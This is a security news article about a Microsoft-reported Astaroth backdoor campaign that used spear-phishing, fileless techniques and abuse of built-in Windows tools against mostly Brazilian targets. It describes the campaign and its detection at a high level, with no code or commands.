Attackers are delivering the Astaroth info-stealing backdoor by leveraging a combination of fileless malware and “living off the land” techniques, Microsoft’s security team warns.
The attack starts with spear-phishing emails targeting employees and tricking them into following the included link to an archive file, and ends with Astaroth being run directly in memory (injected into the Userinit process).
“For traditional, file-centric antivirus solutions, the only window of opportunity to detect this attack may be when the two DLLs are decoded after being downloaded—after all, every executable used in the attack is non-malicious,” says Andrea Lelli, a member of the Windows Defender ATP team.
“If this were the case, this attack would pose a serious problem: since the DLLs use code obfuscation and are likely to change very rapidly between campaigns, focusing on these DLLs would be a vicious trap.”
Instead, defenders should focus on spotting fileless techniques, some of which many be so unusual and anomalous that they draw immediate attention to the malware.
In fact, this is how Microsoft spotted this specific campaign: their telemetry showed noticeable spikes in the use of the WMIC tool to run a script.
Similar previous attacks
The attackers delivering Astaroth have been at it for quite a while and the techniques they use are obviously successful enough for them to make just minor modifications.
For example, in the campaign detailed by Cybereason researchers in February 2019, the attackers also misused the WMIC and BITSAdmin utilities, as well as Userinit (if another process common on targeted Brazilian machines wasn’t available).
They also took advantage of a component of Avast AV to gain information about the target system.
Both of these campaigns have been heavily targeting Brazilian users/organizations.